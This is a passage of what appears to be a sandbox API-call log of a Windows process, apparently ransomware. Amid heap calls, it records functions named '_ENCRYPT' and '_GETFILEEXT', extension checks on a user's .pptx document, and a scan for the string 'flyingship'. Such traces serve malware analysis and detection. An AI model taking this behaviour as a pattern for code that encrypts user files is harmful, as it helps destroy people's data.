[0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.717] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0173.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0173.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.720] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.721] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0173.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.721] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.722] CloseHandle (hObject=0x138) returned 1 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.723] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.723] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.724] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.724] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.724] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.724] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.724] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0x90add8 [0173.726] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.726] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0x90add8 [0173.726] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS 